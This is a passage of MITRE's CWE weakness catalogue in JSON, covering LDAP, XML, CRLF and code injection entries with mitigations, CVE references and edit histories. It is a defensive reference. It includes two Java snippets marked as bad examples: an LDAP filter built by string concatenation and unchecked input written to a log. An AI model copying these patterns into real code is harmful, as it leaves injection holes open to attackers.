Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Description, Name, White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Demonstrative_Examples, Detection_Factors, Potential_Mitigations, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Description, Detection_Factors, Name, Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Potential_Mitigations, References, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Enabling_Factors_for_Exploitation, Likelihood_of_Exploit, Modes_of_Introduction, Observed_Examples, References, Relationships, White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"SQL Injection","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize Data into SQL Queries (aka \'SQL Injection\')","attr":{"@_Date":"2008-09-09"}},{"#text":"Failure to Sanitize Data within SQL Queries (aka \'SQL Injection\')","attr":{"@_Date":"2009-01-12"}},{"#text":"Failure to Preserve SQL Query Structure (aka \'SQL Injection\')","attr":{"@_Date":"2009-05-27"}},{"#text":"Failure to Preserve SQL Query Structure (\'SQL Injection\')","attr":{"@_Date":"2009-07-27"}},{"#text":"Improper Sanitization of Special Elements used in an SQL Command (\'SQL Injection\')","attr":{"@_Date":"2010-06-21"}}]}},"90":{"attr":{"@_ID":"90","@_Name":"Improper Neutralization of Special Elements used in an LDAP Query (\'LDAP Injection\')","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software constructs all or part of an LDAP query using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended LDAP query when it is sent to a downstream component.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"943","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Name":"Database Server","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":["Execute Unauthorized Code or Commands","Read Application Data","Modify Application Data"],"Note":"An attacker could include input that changes the LDAP query which allows unintended commands or code to be executed, allows sensitive data to be read or modified or causes other unintended behavior."}},"Potential_Mitigations":{"Mitigation":{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The code below constructs an LDAP query using user input address data:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"context = new InitialDirContext(env);String searchFilter = \\"StreetAddress=\\" + address;NamingEnumeration answer = context.search(searchBase, searchFilter, searchCtls);","xhtml:br":["",""]}},"Body_Text":"Because the code fails to neutralize the address string used to construct the query, an attacker can supply an address that includes additional LDAP queries."}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2005-2301","Description":"Server does not properly escape LDAP queries, which allows remote attackers to cause a DoS and possibly conduct an LDAP injection attack.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2301"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"LDAP injection"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2007"},"Entry_ID":"A2","Entry_Name":"Injection Flaws","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":29,"Entry_Name":"LDAP Injection"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"136"}}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-879"}}},"Notes":{"Note":[{"#text":"Factors: resultant to special character mismanagement, MAID, or denylist/allowlist problems. Can be primary to authentication and verification errors.","attr":{"@_Type":"Relationship"}},{"#text":"Under-reported. This is likely found very frequently by third party code auditors, but there are very few publicly reported examples.","attr":{"@_Type":"Research Gap"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Other_Notes, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Demonstrative_Examples, Description, Name, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Observed_Examples, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"LDAP Injection","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize Data into LDAP Queries (aka \'LDAP Injection\')","attr":{"@_Date":"2009-05-27"}},{"#text":"Failure to Sanitize Data into LDAP Queries (\'LDAP Injection\')","attr":{"@_Date":"2010-06-21"}}]}},"91":{"attr":{"@_ID":"91","@_Name":"XML Injection (aka Blind XPath Injection)","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not properly neutralize special elements that are used in XML, allowing attackers to modify the syntax, content, or commands of the XML before it is processed by an end system.","Extended_Description":"Within XML, special elements could include reserved words or characters such as \\"&lt;\\", \\"&gt;\\", \\"\\"\\", and \\"&amp;\\", which could then be used to add new data or modify XML syntax.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"74","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"74","@_View_ID":"1003","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":["Execute Unauthorized Code or Commands","Read Application Data","Modify Application Data"]}},"Potential_Mitigations":{"Mitigation":{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"XML injection (aka Blind Xpath injection)"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2007"},"Entry_ID":"A2","Entry_Name":"Injection Flaws","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A6","Entry_Name":"Injection Flaws","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":23,"Entry_Name":"XML Injection"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"250"}},{"attr":{"@_CAPEC_ID":"83"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-882"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 17, &#34;XML Injection&#34;, Page 1069"}}]},"Notes":{"Note":[{"#text":"The description for this entry is generally applicable to XML, but the name includes \\"blind XPath injection\\" which is more closely associated with CWE-643. Therefore this entry might need to be deprecated or converted to a general category - although injection into raw XML is not covered by CWE-643 or CWE-652.","attr":{"@_Type":"Maintenance"}},{"#text":"In vulnerability theory terms, this is a representation-specific case of a Data/Directive Boundary Error.","attr":{"@_Type":"Theoretical"}},{"#text":"Under-reported. This is likely found regularly by third party code auditors, but there are very few publicly reported examples.","attr":{"@_Type":"Research Gap"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Maintenance_Notes, Other_Notes, Theoretical_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"}]}},"92":{"attr":{"@_ID":"92","@_Name":"DEPRECATED: Improper Sanitization of Custom Special Characters","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Deprecated"},"Description":"This entry has been deprecated. It originally came from PLOVER, which sometimes defined \\"other\\" and \\"miscellaneous\\" categories in order to satisfy exhaustiveness requirements for taxonomies. Within the context of CWE, the use of a more abstract entry is preferred in mapping situations. CWE-75 is a more appropriate mapping.","Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Maintenance_Notes, Relationships, Relationship_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Applicable_Platforms, Causal_Nature, Maintenance_Notes, Name, Observed_Examples, Potential_Mitigations, Related_Attack_Patterns, Relationship_Notes, Relationships, Research_Gaps, Taxonomy_Mappings, Time_of_Introduction, Type, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description, Maintenance_Notes"}],"Previous_Entry_Name":[{"#text":"Custom Special Character Injection","attr":{"@_Date":"2008-10-14"}},{"#text":"Insufficient Sanitization of Custom Special Characters","attr":{"@_Date":"2009-05-27"}},{"#text":"Improper Sanitization of Custom Special Characters","attr":{"@_Date":"2009-07-27"}}]}},"93":{"attr":{"@_ID":"93","@_Name":"Improper Neutralization of CRLF Sequences (\'CRLF Injection\')","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software uses CRLF (carriage return line feeds) as a special element, e.g. to separate lines or records, but it does not neutralize or incorrectly neutralizes CRLF sequences from inputs.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"74","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"117","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Modify Application Data"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Avoid using CRLF as a special sequence."},{"Phase":"Implementation","Description":"Appropriately filter or quote CRLF sequences in user-controlled input."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"If user input data that eventually makes it to a log message isn\'t checked for CRLF characters, it may be possible for an attacker to forge entries in a log file.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":"logger.info(\\"User\'s street address: \\" + request.getParameter(\\"streetAddress\\"));"}}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-1771","Description":"CRLF injection enables spam proxy (add mail headers) using email address or name.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1771"},{"Reference":"CVE-2002-1783","Description":"CRLF injection in API function arguments modify headers for outgoing requests.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1783"},{"Reference":"CVE-2004-1513","Description":"Spoofed entries in web server log file via carriage returns","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1513"},{"Reference":"CVE-2006-4624","Description":"Chain: inject fake log entries with fake timestamps using CRLF injection","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4624"},{"Reference":"CVE-2005-1951","Description":"Chain: Application accepts CRLF in an object ID, allowing HTTP response splitting.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1951"},{"Reference":"CVE-2004-1687","Description":"Chain: HTTP response splitting via CRLF in parameter related to URL.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1687"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"CRLF Injection"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2007"},"Entry_ID":"A2","Entry_Name":"Injection Flaws","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":24,"Entry_Name":"HTTP Request Splitting"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"15"}},{"attr":{"@_CAPEC_ID":"81"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-928"}}},"Notes":{"Note":{"#text":"Probably under-studied, although gaining more prominence in 2005 as a result of interest in HTTP response splitting.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Likelihood_of_Exploit"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Related_Attack_Patterns, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature, Likelihood_of_Exploit, Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"CRLF Injection","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize CRLF Sequences (aka \'CRLF Injection\')","attr":{"@_Date":"2009-05-27"}},{"#text":"Failure to Sanitize CRLF Sequences (\'CRLF Injection\')","attr":{"@_Date":"2010-06-21"}}]}},"94":{"attr":{"@_ID":"94","@_Name":"Improper Control of Generation of Code (\'Code Injection\')","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment.","Extended_Description":{"xhtml:p":["When software allows a user\'s input to contain code syntax, it might be possible for an attacker to craft the code in such a way that it will alter the intended control flow of the software. Such an alteration could lead to arbitrary code execution.","Injection problems encompass a wide variety of issues -- all mitigated in very different ways. For this reason, the most effective way to discuss these weaknesses is to note the distinct features which classify them as injection weaknesses. The most important issue to note is that all injection problems share one thing in common -- i.e., they allow for the injection of control plane data into the user-controlled data plane. This means that the execution of the process may be altered by sending code in through legitimate data channels, using no other mechanism. While buffer overflows, and many other flaws, involve the use of some further issue to gain execution, injection problems need only for the data to be parsed. The most classic instantiations of this category of weakness are SQL injection and format string vulnerabilities."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"74","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"74","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"913","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"691","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Interpreted","@_Prevalence":"Sometimes"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":[{"Scope":"Access Control","Impact":"Bypass Protection Mechanism","Note":"In some cases, injectable code controls authentication; this may lead to a remote vulnerability."},{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity","Note":"Injected code can access resources that the attacker is directly prevented from accessing."},{"Scope":["Integrity","Confidentiality","Availability"],"Impact":"Execute Unauthorized Code or Commands","Note":"Code injection attacks can lead to loss of data integrity in nearly all cases as the control-plane data injected is always incidental to data recall or writing. Additionally, code injection can often result in the execution of arbitrary code."},{"Scope":"Non-Repudiation","Impact":"Hide Activities","Note":"Often the actions performed by injected control code are unlogged."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Refactor your program so that you do not have to dynamically generate code."},{"Phase":"Architecture and Design","Description":{"xhtml:p":["Run your code in a \\"jail\\" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may 